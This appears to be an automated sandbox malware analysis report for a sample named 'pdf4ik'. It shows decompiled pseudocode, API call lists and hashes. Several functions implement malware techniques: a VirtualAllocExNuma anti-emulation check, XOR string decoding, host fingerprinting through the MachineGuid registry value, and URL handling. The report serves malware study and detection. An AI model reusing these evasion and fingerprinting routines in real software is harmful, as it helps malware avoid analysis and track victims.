                                        				if(_a24 >= 0x10) {
                                        					_t111 = _a4;
                                        					_push(_a4);
                                        					_t88 = E29DADF3B();
                                        					_t128 = _t128 + 4;
                                        				}
                                        				_a24 = 0xf;
                                        				_a20 = 0;
                                        				_a4 = 0;
                                        				if(_a52 >= 0x10) {
                                        					_push(_a32);
                                        					_t88 = E29DADF3B();
                                        					_t128 = _t128 + 4;
                                        				}
                                        				_a52 = 0xf;
                                        				_a48 = 0;
                                        				_a32 = 0;
                                        				if(_a80 >= 0x10) {
                                        					_push(_a60);
                                        					_t88 = E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t116);
                                        				_pop(_t121);
                                        				_pop(_t98);
                                        				return E29DADF46(_t88, _t98, _v20 ^ _t122, _t111, _t116, _t121);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D925F8
                                        • _memset.LIBCMT ref: 29D92607
                                        • lstrlenA.KERNEL32(?,10000000,?,?,?,D9555F04), ref: 29D92639
                                        • InternetCrackUrlA.WININET(?,00000000), ref: 29D92641
                                        • StrCmpCA.SHLWAPI(?,https,?,?,D9555F04), ref: 29D9265C
                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$CrackInternetlstrlen
                                        • String ID: <$@$ERROR$http$https
                                        • API String ID: 3332450456-156369483
                                        • Opcode ID: c063da12de62c4f105b81544693420fdccc3f43ce393a585bd71db305d580554
                                        • Instruction ID: d4c0b01c65ea875aad4b90cf38f00c3709c3b4eefddc291258b766457054c617
                                        • Opcode Fuzzy Hash: c063da12de62c4f105b81544693420fdccc3f43ce393a585bd71db305d580554
                                        • Instruction Fuzzy Hash: 7C6199B1C01248EBDB01DF99C880BCEBB78FF14750F50819EE519AB641D7349A46DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2001 29d84750-29d8477c 2002 29d84782-29d84787 2001->2002 2002->2002 2003 29d84789-29d847f7 lstrcatA lstrlenA * 2 LocalAlloc lstrlenA * 4 2002->2003 2004 29d847f9-29d847fe 2003->2004 2005 29d8484c-29d84867 lstrlenA call 29dadf46 2003->2005 2006 29d84804-29d8484a lstrlenA * 3 2004->2006 2006->2005 2006->2006
                                        C-Code - Quality: 94%
                                        			E29D84750(intOrPtr __ecx, intOrPtr _a4, CHAR* _a8) {
                                        				signed int _v8;
                                        				char _v1008;
                                        				void* _v1012;
                                        				intOrPtr _v1016;
                                        				CHAR* _v1020;
                                        				intOrPtr _v1024;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t34;
                                        				char* _t37;
                                        				void* _t42;
                                        				signed int _t55;
                                        				void* _t61;
                                        				void* _t64;
                                        				intOrPtr _t80;
                                        				signed int _t81;
                                        				void* _t82;
                                        				signed int _t83;
                                        
                                        				_t34 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t34 ^ _t83;
                                        				_t80 = __ecx;
                                        				_v1020 = _a8;
                                        				_v1016 = __ecx;
                                        				_t64 = 0x3e8;
                                        				_t37 =  &_v1008;
                                        				do {
                                        					 *_t37 = 0;
                                        					_t37 = _t37 + 1;
                                        					_t64 = _t64 - 1;
                                        				} while (_t64 != 0);
                                        				lstrcatA( &_v1008, 0x29dcd598);
                                        				_t82 = lstrlenA;
                                        				lstrlenA( &_v1008);
                                        				lstrlenA( &_v1008);
                                        				_t42 = LocalAlloc(0x40, _t80 + 1); // executed
                                        				_t61 = _t42;
                                        				_v1012 = _t61;
                                        				lstrlenA( &_v1008);
                                        				lstrlenA( &_v1008);
                                        				 *((char*)(_t80 + _t61)) = 0;
                                        				lstrlenA( &_v1008);
                                        				_t77 =  &_v1008;
                                        				lstrlenA( &_v1008);
                                        				_t81 = 0;
                                        				if(_v1016 > 0) {
                                        					_v1024 = _a4 - _t61;
                                        					do {
                                        						lstrlenA( &_v1008);
                                        						_t55 = lstrlenA(_v1020);
                                        						_t77 = _v1024;
                                        						 *(_t61 + _t81) = _v1020[_t81 % _t55] ^  *(_v1024 + _t61 + _t81);
                                        						lstrlenA( &_v1008);
                                        						_t61 = _v1012;
                                        						_t81 = _t81 + 1;
                                        					} while (_t81 < _v1016);
                                        				}
                                        				lstrlenA( &_v1008);
                                        				return E29DADF46(_t61, _t61, _v8 ^ _t83, _t77, _t81, _t82);
                                        			}























                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocLocallstrcat
                                        • String ID:
                                        • API String ID: 3085635063-0
                                        • Opcode ID: 28435fecefe41e7cd82ca9312987e46fd86f5befd63e0df1bb87871fceae363a
                                        • Instruction ID: dca5ca90d0bf86585013302c7b06edb0081fac8df9eb2951cb57117a39fdd2ce
                                        • Opcode Fuzzy Hash: 28435fecefe41e7cd82ca9312987e46fd86f5befd63e0df1bb87871fceae363a
                                        • Instruction Fuzzy Hash: A6316171D1026E9BCB26DF68CCD0AAEB7FDEF49200F0091EAA509D3144DA346B469F90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 95%
                                        			E29DA34D0(void* __ebx, void* __edi, char* __esi) {
                                        				signed int _v8;
                                        				char _v263;
                                        				char _v264;
                                        				char _v520;
                                        				int _v524;
                                        				void* _v528;
                                        				signed int _t19;
                                        				long _t23;
                                        				intOrPtr* _t27;
                                        				void* _t34;
                                        				intOrPtr _t37;
                                        				void* _t43;
                                        				void* _t46;
                                        				char* _t47;
                                        				signed int _t48;
                                        
                                        				_t47 = __esi;
                                        				_t46 = __edi;
                                        				_t34 = __ebx;
                                        				_t19 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t19 ^ _t48;
                                        				_v524 = 0;
                                        				_v524 = 0xff;
                                        				_v264 = 0;
                                        				E29DB5640( &_v263, 0, 0xfe);
                                        				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v528); // executed
                                        				if(_t23 == 0) {
                                        					RegQueryValueExA(_v528, "MachineGuid", 0, 0,  &_v264,  &_v524); // executed
                                        				}
                                        				RegCloseKey(_v528);
                                        				CharToOemA( &_v264,  &_v520);
                                        				_t27 =  &_v520;
                                        				 *((intOrPtr*)(_t47 + 0x14)) = 0xf;
                                        				 *(_t47 + 0x10) = 0;
                                        				 *_t47 = 0;
                                        				_t43 = _t27 + 1;
                                        				do {
                                        					_t37 =  *_t27;
                                        					_t27 = _t27 + 1;
                                        				} while (_t37 != 0);
                                        				E29D892C0(_t47,  &_v520, _t27 - _t43);
                                        				return E29DADF46(_t47, _t34, _v8 ^ _t48,  &_v520, _t46, _t47);
                                        			}



















                                        APIs
                                        • _memset.LIBCMT ref: 29DA350C
                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 29DA352C
                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 29DA3554
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3561
                                        • CharToOemA.USER32(00000000,?), ref: 29DA3575
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                        • API String ID: 2235053359-1211650757
                                        • Opcode ID: ecc9d4ef5eb47435f21d4cc9fb616d98ca363a77510968592e6673e6bd0667b2
                                        • Instruction ID: 9d142827abfc315d94cc87020d989bbe5a2b1ac2cee004b8397fe9c604a76fc7
                                        • Opcode Fuzzy Hash: ecc9d4ef5eb47435f21d4cc9fb616d98ca363a77510968592e6673e6bd0667b2
                                        • Instruction Fuzzy Hash: 2021D4B1500319ABD720DF54CC48FDAB7B8AF54704F1081DCE55997182DBB4AB899FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2020 29d81060-29d8107f GetCurrentProcess VirtualAllocExNuma 2021 29d81088 VirtualAlloc 2020->2021 2022 29d81081-29d81082 ExitProcess 2020->2022 2024 29d8101e-29d81021 2021->2024 2025 29d81023-29d81029 2021->2025 2024->2025 2026 29d8102b-29d81050 call 29db5640 VirtualFree 2025->2026 2027 29d81056-29d81058 2025->2027 2026->2027
                                        C-Code - Quality: 35%
                                        			E29D81060(void* __ecx) {
                                        				void* _t1;
                                        				void* _t2;
                                        				int _t4;
                                        				void* _t11;
                                        
                                        				_t1 = GetCurrentProcess();
                                        				__imp__VirtualAllocExNuma(_t1, 0, 0x7d0, 0x3000, 0x40, 0); // executed
                                        				if(_t1 == 0) {
                                        					ExitProcess(__eax);
                                        				}
                                        				_t2 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
                                        				_t11 = _t2;
                                        				_push(_t2);
                                        				if(_t2 != 0x11) {
                                        					asm("cld");
                                        				}
                                        				asm("clc");
                                        				_pop(_t4);
                                        				if(_t11 != 0) {
                                        					E29DB5640(_t11, 0, 0x5e69ec0);
                                        					_push(_t6);
                                        					asm("cld");
                                        					_t4 = VirtualFree(_t11, 0x17c841c0, 0x8000);
                                        				}
                                        				return _t4;
                                        			}








                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004), ref: 29D81010
                                        • _memset.LIBCMT ref: 29D81036
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 29D81050
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 29D81070
                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 29D81077
                                        • ExitProcess.KERNEL32 ref: 29D81082
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                        • String ID:
                                        • API String ID: 1859398019-0
                                        • Opcode ID: 58c99733f2270c4e6ceaa300fd9e879174c20a10f3a397532cff4eaf8dff35d5
                                        • Instruction ID: 72fc070472e54d653c2df3781ce23471e360f370c8c07ab24f8427293d55a218
                                        • Opcode Fuzzy Hash: 58c99733f2270c4e6ceaa300fd9e879174c20a10f3a397532cff4eaf8dff35d5
                                        • Instruction Fuzzy Hash: 42F09671B8A36177E21526602D1EF9B565C7F02F92F205004F745FA1C1D658950A75E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2030 29dae70e-29dae716 2031 29dae725-29dae730 call 29dadfe0 2030->2031 2034 29dae718-29dae723 call 29db35ce 2031->2034 2035 29dae732-29dae733 2031->2035 2034->2031 2038 29dae734-29dae745 2034->2038 2039 29dae773-29dae78d call 29dae1a8 call 29daff06 2038->2039 2040 29dae747-29dae772 call 29dae074 call 29daed61 2038->2040 2040->2039
                                        C-Code - Quality: 93%
                                        			E29DAE70E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                        				char* _v8;
                                        				signed int _v16;
                                        				char _v20;
                                        				void* __ebp;
                                        				void* _t34;
                                        				signed int _t35;
                                        				signed int _t39;
                                        				intOrPtr _t42;
                                        				intOrPtr _t44;
                                        				void* _t51;
                                        				intOrPtr* _t54;
                                        				signed int _t59;
                                        				signed int _t60;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t66;
                                        				intOrPtr* _t68;
                                        
                                        				_t66 = __esi;
                                        				_t64 = __edi;
                                        				_t63 = __edx;
                                        				_t51 = __ebx;
                                        				while(1) {
                                        					_t34 = E29DADFE0(_t63, _t64, _t66, _a4); // executed
                                        					if(_t34 != 0) {
                                        						return _t34;
                                        					}
                                        					_t35 = E29DB35CE(_t34, _a4);
                                        					__eflags = _t35;
                                        					if(_t35 == 0) {
                                        						__eflags =  *0x29dd6cdc & 0x00000001;
                                        						if(( *0x29dd6cdc & 0x00000001) == 0) {
                                        							 *0x29dd6cdc =  *0x29dd6cdc | 0x00000001;
                                        							__eflags =  *0x29dd6cdc;
                                        							_push(1);
                                        							_v8 = "bad allocation";
                                        							E29DAE074(0x29dd6cd0,  &_v8);
                                        							 *0x29dd6cd0 = 0x29dc52ac;
                                        							E29DAED61( *0x29dd6cdc, 0x29dc4581);
                                        						}
                                        						_t54 =  &_v20;
                                        						E29DAE1A8(_t54, 0x29dd6cd0);
                                        						_v20 = 0x29dc52ac;
                                        						E29DAFF06( &_v20, 0x29dd2028);
                                        						asm("int3");
                                        						_t39 = _v16;
                                        						_push(0x29dc52ac);
                                        						_t68 = _t54;
                                        						 *((char*)(_t68 + 0xc)) = 0;
                                        						__eflags = _t39;
                                        						if(__eflags != 0) {
                                        							 *_t68 =  *_t39;
                                        							_t32 = _t39 + 4; // 0x29d84fc0
                                        							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
                                        						} else {
                                        							_t42 = E29DB524B(_t51, _t63, __eflags);
                                        							 *((intOrPtr*)(_t68 + 8)) = _t42;
                                        							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
                                        							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
                                        							__eflags =  *_t68 -  *0x29dd5de0; // 0x2bab2e28
                                        							if(__eflags != 0) {
                                        								_t60 =  *0x29dd5b98; // 0xfffffffe
                                        								__eflags =  *(_t42 + 0x70) & _t60;
                                        								if(__eflags == 0) {
                                        									 *_t68 = E29DB5022(_t51, _t63, 0x29dd6cd0, _t68, __eflags);
                                        								}
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x29dd5aa0; // 0x2bab1678
                                        							if(__eflags != 0) {
                                        								_t59 =  *0x29dd5b98; // 0xfffffffe
                                        								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
                                        								if(__eflags == 0) {
                                        									 *((intOrPtr*)(_t68 + 4)) = E29DB48A1(_t51, _t63, 0x29dd6cd0, _t68, __eflags);
                                        								}
                                        							}
                                        							_t44 =  *((intOrPtr*)(_t68 + 8));
                                        							__eflags =  *(_t44 + 0x70) & 0x00000002;
                                        							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
                                        								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
                                        								 *((char*)(_t68 + 0xc)) = 1;
                                        							}
                                        						}
                                        						return _t68;
                                        					} else {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        			}





















                                        APIs
                                        • _malloc.LIBCMT ref: 29DAE728
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • std::exception::exception.LIBCMT ref: 29DAE75D
                                        • std::exception::exception.LIBCMT ref: 29DAE777
                                        • __CxxThrowException@8.LIBCMT ref: 29DAE788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: )
                                        • API String ID: 615853336-2427484129
                                        • Opcode ID: db83cdc9f450082ef231d4f0bf568fa6881e7466abe1a6c7cebb74f9d62ff989
                                        • Instruction ID: c5939900f600fbaf5c91224838db69a72660eddba28b4d444799e7ca4d8bbe7e
                                        • Opcode Fuzzy Hash: db83cdc9f450082ef231d4f0bf568fa6881e7466abe1a6c7cebb74f9d62ff989
                                        • Instruction Fuzzy Hash: 44F0F43A4001297ADB08AB69C844A5D7AA8EF70214F50841DE440AA990DF719A17FBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2049 29d923b0-29d92465 call 29d892c0 call 29d894c0 call 29d91560 call 29d891d0 2058 29d92473-29d92486 2049->2058 2059 29d92467-29d92470 call 29dadf3b 2049->2059 2061 29d92488 2058->2061 2062 29d9248b-29d92499 StrCmpCA 2058->2062 2059->2058 2061->2062 2064 29d9249b-29d924a1 2062->2064 2065 29d9250d-29d9250f 2062->2065 2066 29d924a3 2064->2066 2067 29d924a6-29d924b9 call 29d95240 2064->2067 2068 29d92514-29d92527 call 29d892c0 2065->2068 2066->2067 2073 29d924e8 2067->2073 2074 29d924bb-29d924ce call 29d896c0 2067->2074 2075 29d92529 2068->2075 2076 29d9252c-29d92531 2068->2076 2077 29d924eb-29d924f5 lstrlenA 2073->2077 2090 29d924d0 2074->2090 2091 29d924d3-29d924e6 call 29daea8e 2074->2091 2075->2076 2079 29d9253f-29d92550 2076->2079 2080 29d92533-29d9253c call 29dadf3b 2076->2080 2077->2065 2083 29d924f7-29d924fc 2077->2083 2081 29d9255e-29d9256a 2079->2081 2082 29d92552-29d9255b call 29dadf3b 2079->2082 2080->2079 2087 29d92578-29d92593 call 29dadf46 2081->2087 2088 29d9256c-29d92575 call 29dadf3b 2081->2088 2082->2081 2089 29d92500-29d92505 2083->2089 2088->2087 2089->2089 2096 29d92507-29d9250b 2089->2096 2090->2091 2091->2077 2096->2068
                                        C-Code - Quality: 30%
                                        			E29D923B0(void* __eflags, intOrPtr _a4, char _a8, char* _a24, intOrPtr _a28, char _a36, intOrPtr _a56, intOrPtr _a64) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				CHAR* _v32;
                                        				char* _v48;
                                        				intOrPtr _v56;
                                        				CHAR* _v60;
                                        				char _v76;
                                        				CHAR* _v80;
                                        				char _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t66;
                                        				signed int _t67;
                                        				void* _t73;
                                        				char** _t75;
                                        				char* _t78;
                                        				char* _t81;
                                        				CHAR* _t86;
                                        				char** _t90;
                                        				CHAR* _t91;
                                        				intOrPtr _t95;
                                        				char* _t96;
                                        				intOrPtr* _t97;
                                        				char _t104;
                                        				intOrPtr _t112;
                                        				intOrPtr _t117;
                                        				CHAR* _t118;
                                        				signed int _t119;
                                        				void* _t120;
                                        				char* _t122;
                                        				intOrPtr* _t123;
                                        				void* _t124;
                                        				void* _t126;
                                        
                                        				_t126 = __eflags;
                                        				_push(0xffffffff);
                                        				_push(E29DC2C68);
                                        				_push( *[fs:0x0]);
                                        				_t66 =  *0x29dd5664; // 0xd9555f04
                                        				_t67 = _t66 ^ _t119;
                                        				_v20 = _t67;
                                        				_push(_t67);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v88 = _a64;
                                        				_v8 = 0;
                                        				_v28 = 0xf;
                                        				_v32 = 0;
                                        				_v48 = 0;
                                        				_v8 = 2;
                                        				_t122 = _t120 - 0x34;
                                        				_t96 = _t122;
                                        				_v92 = _t122;
                                        				_v84 = 0;
                                        				 *((intOrPtr*)(_t96 + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(_t96 + 0x10)) = 0;
                                        				_v80 = 0;
                                        				 *_t96 = 0;
                                        				E29D892C0(_t96, 0x29dcd617, 0);
                                        				_push(1);
                                        				_t123 = _t122 - 0x1c;
                                        				_t97 = _t123;
                                        				_v96 = _t123;
                                        				_v8 = 3;
                                        				_t108 =  &_a36;
                                        				 *((intOrPtr*)(_t97 + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(_t97 + 0x10)) = 0;
                                        				 *_t97 = 0;
                                        				E29D894C0(_t97,  &_a36, 0, 0xffffffff);
                                        				_push( &_v76);
                                        				_v8 = 2;
                                        				_t73 = E29D91560(_t126); // executed
                                        				_t124 = _t123 + 0x40;
                                        				_v8 = 4;
                                        				E29D891D0(_t73,  &_v48);
                                        				_v8 = 2;
                                        				if(_v56 >= 0x10) {
                                        					_push(_v76);
                                        					E29DADF3B();
                                        					_t124 = _t124 + 4;
                                        				}
                                        				_t75 = _v48;
                                        				_v56 = 0xf;
                                        				_v60 = 0;
                                        				_v76 = 0;
                                        				if(_v28 < 0x10) {
                                        					_t75 =  &_v48;
                                        				}
                                        				_push("ERROR");
                                        				_push(_t75);
                                        				if( *0x29dd8550() == 0) {
                                        					L16:
                                        					_push(5);
                                        					_push("ERROR");
                                        				} else {
                                        					_t81 = _a8;
                                        					if(_a28 < 0x10) {
                                        						_t81 =  &_a8;
                                        					}
                                        					_t108 = _a24;
                                        					if(E29D95240(0,  &_v48, _t81, _a24) == 0xffffffff) {
                                        						_t118 = _v80;
                                        					} else {
                                        						E29D896C0( &_v48, 0, _t84 + _a4);
                                        						_t90 = _v48;
                                        						if(_v28 < 0x10) {
                                        							_t90 =  &_v48;
                                        						}
                                        						_t108 =  &_v84;
                                        						_t91 = E29DAEA8E(0,  &_v84, 0x10, _t90, _v88,  &_v84);
                                        						_t124 = _t124 + 0xc;
                                        						_t118 = _t91;
                                        					}
                                        					if(lstrlenA(_t118) < 1) {
                                        						goto L16;
                                        					} else {
                                        						_t86 = _t118;
                                        						_t108 =  &(_t86[1]);
                                        						do {
                                        							_t104 =  *_t86;
                                        							_t86 =  &(_t86[1]);
                                        						} while (_t104 != 0);
                                        						_push(_t86 - _t108);
                                        						_push(_t118);
                                        					}
                                        				}
                                        				E29D892C0(0x29dd62cc);
                                        				_t78 = _v48;
                                        				_v32 = 0;
                                        				if(_v28 < 0x10) {
                                        					_t78 =  &_v48;
                                        				}
                                        				 *_t78 = 0;
                                        				if(_v28 >= 0x10) {
                                        					_t108 = _v48;
                                        					_push(_v48);
                                        					_t78 = E29DADF3B();
                                        					_t124 = _t124 + 4;
                                        				}
                                        				_v28 = 0xf;
                                        				_v32 = 0;
                                        				_v48 = 0;
                                        				if(_a28 >= 0x10) {
                                        					_push(_a8);
                                        					_t78 = E29DADF3B();
                                        					_t124 = _t124 + 4;
                                        				}
                                        				_a28 = 0xf;
                                        				_a24 = 0;
                                        				_a8 = 0;
                                        				if(_a56 >= 0x10) {
                                        					_push(_a36);
                                        					_t78 = E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t112);
                                        				_pop(_t117);
                                        				_pop(_t95);
                                        				return E29DADF46(_t78, _t95, _v20 ^ _t119, _t108, _t112, _t117);
                                        			}

                                        APIs
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 29D92491
                                        • _strtok_s.LIBCMT ref: 29D924DC
                                        • lstrlenA.KERNEL32(?,?,?,?), ref: 29D924EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argument_memmove_strtok_slstrlenstd::_
                                        • String ID: ERROR
                                        • API String ID: 2316618217-2861137601
                                        • Opcode ID: 9e1a07ec305cc2b3585fb540468361619044725bf63b2f53b4a180414a53283c
                                        • Instruction ID: e1b514fa25b03b88ae4c7740beee14e5add2ab9d67c537022aeaad14d5212bd6
                                        • Opcode Fuzzy Hash: 9e1a07ec305cc2b3585fb540468361619044725bf63b2f53b4a180414a53283c
                                        • Instruction Fuzzy Hash: 3061B2B1C10248EFDF01DFA8C885ADEBBB8EF18310F10816EE515AB641D7349A06DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2101 29d89750-29d8978b 2102 29d8978d-29d8978f 2101->2102 2103 29d89791-29d897a3 2101->2103 2104 29d897b8-29d897c2 2102->2104 2103->2104 2105 29d897a5-29d897b1 2103->2105 2107 29d897c4-29d897c7 2104->2107 2108 29d897d6-29d897d9 2104->2108 2105->2104 2106 29d897b3 2105->2106 2106->2104 2110 29d897c9-29d897ca call 29dae70e 2107->2110 2111 29d897db-29d89825 call 29dae0fc call 29daff06 call 29d898c0 2107->2111 2109 29d8982c-29d89831 2108->2109 2112 29d8984d-29d89851 2109->2112 2113 29d89833-29d89837 2109->2113 2121 29d897cf-29d897d4 2110->2121 2111->2109 2119 29d8985e-29d8986f 2112->2119 2120 29d89853-29d8985b call 29dadf3b 2112->2120 2116 29d89839-29d8983b 2113->2116 2117 29d8983d 2113->2117 2122 29d8983f-29d8984a call 29db0010 2116->2122 2117->2122 2125 29d89871 2119->2125 2126 29d89873-29d89888 2119->2126 2120->2119 2121->2108 2121->2111 2122->2112 2125->2126
                                        C-Code - Quality: 69%
                                        			E29D89750(intOrPtr* __ecx, signed int _a4, intOrPtr _a8) {
                                        				char _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr* _v24;
                                        				char _v28;
                                        				signed int _v32;
                                        				char _v44;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t38;
                                        				signed int _t41;
                                        				signed int _t42;
                                        				intOrPtr* _t44;
                                        				unsigned int _t55;
                                        				intOrPtr _t56;
                                        				unsigned int _t60;
                                        				void* _t61;
                                        				intOrPtr* _t73;
                                        				signed int _t77;
                                        				signed int _t82;
                                        				intOrPtr _t83;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1D80);
                                        				_push( *[fs:0x0]);
                                        				_t83 = _t82 - 0x1c;
                                        				_push(_t55);
                                        				_t35 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t35 ^ _t82);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t83;
                                        				_t73 = __ecx;
                                        				_v24 = __ecx;
                                        				_t38 = _a4;
                                        				_t77 = _t38 | 0x0000000f;
                                        				if(_t77 <= 0xfffffffe) {
                                        					_t55 =  *(__ecx + 0x14);
                                        					_t60 = _t55 >> 1;
                                        					_t69 = 0xaaaaaaab * _t77 >> 0x20 >> 1;
                                        					__eflags = _t60 - 0xaaaaaaab * _t77 >> 0x20 >> 1;
                                        					if(__eflags > 0) {
                                        						_t77 = _t60 + _t55;
                                        						__eflags = _t55 - 0xfffffffe - _t60;
                                        						if(__eflags > 0) {
                                        							_t77 = 0xfffffffe;
                                        						}
                                        					}
                                        				} else {
                                        					_t77 = _t38;
                                        				}
                                        				_t41 = 0;
                                        				_t11 = _t77 + 1; // 0xffffffff
                                        				_t61 = _t11;
                                        				_v8 = 0;
                                        				if(_t61 <= 0) {
                                        					L8:
                                        					_a4 = _t41;
                                        					_t56 = _a8;
                                        					if(_t56 != 0) {
                                        						if( *(_t73 + 0x14) < 0x10) {
                                        							_t44 = _t73;
                                        						} else {
                                        							_t44 =  *_t73;
                                        						}
                                        						E29DB0010(_a4, _t44, _t56);
                                        						_t83 = _t83 + 0xc;
                                        					}
                                        					if( *(_t73 + 0x14) >= 0x10) {
                                        						_push( *_t73);
                                        						E29DADF3B();
                                        					}
                                        					_t42 = _a4;
                                        					 *_t73 = 0;
                                        					 *_t73 = _t42;
                                        					 *(_t73 + 0x14) = _t77;
                                        					 *((intOrPtr*)(_t73 + 0x10)) = _t56;
                                        					if(_t77 >= 0x10) {
                                        						_t73 = _t42;
                                        					}
                                        					 *((char*)(_t73 + _t56)) = 0;
                                        					 *[fs:0x0] = _v16;
                                        					return _t42;
                                        				} else {
                                        					_t88 = _t61 - 0xffffffff;
                                        					if(_t61 > 0xffffffff) {
                                        						L9:
                                        						_v28 = 0;
                                        						E29DAE0FC( &_v44,  &_v28);
                                        						_v44 = 0x29dc52ac;
                                        						E29DAFF06( &_v44, 0x29dd2028);
                                        						_v32 = _a4;
                                        						_v20 = _t83;
                                        						__eflags = _v24 + 0x18;
                                        						_v8 = 2;
                                        						_a4 = E29D898C0(_t73, _t77, _a4 + 1);
                                        						return E29D89826;
                                        					} else {
                                        						_t41 = E29DAE70E(_t55, _t69, _t73, _t77, _t88, _t61); // executed
                                        						_t83 = _t83 + 4;
                                        						if(0 == 0) {
                                        							goto L9;
                                        						} else {
                                        							goto L8;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D897E9
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
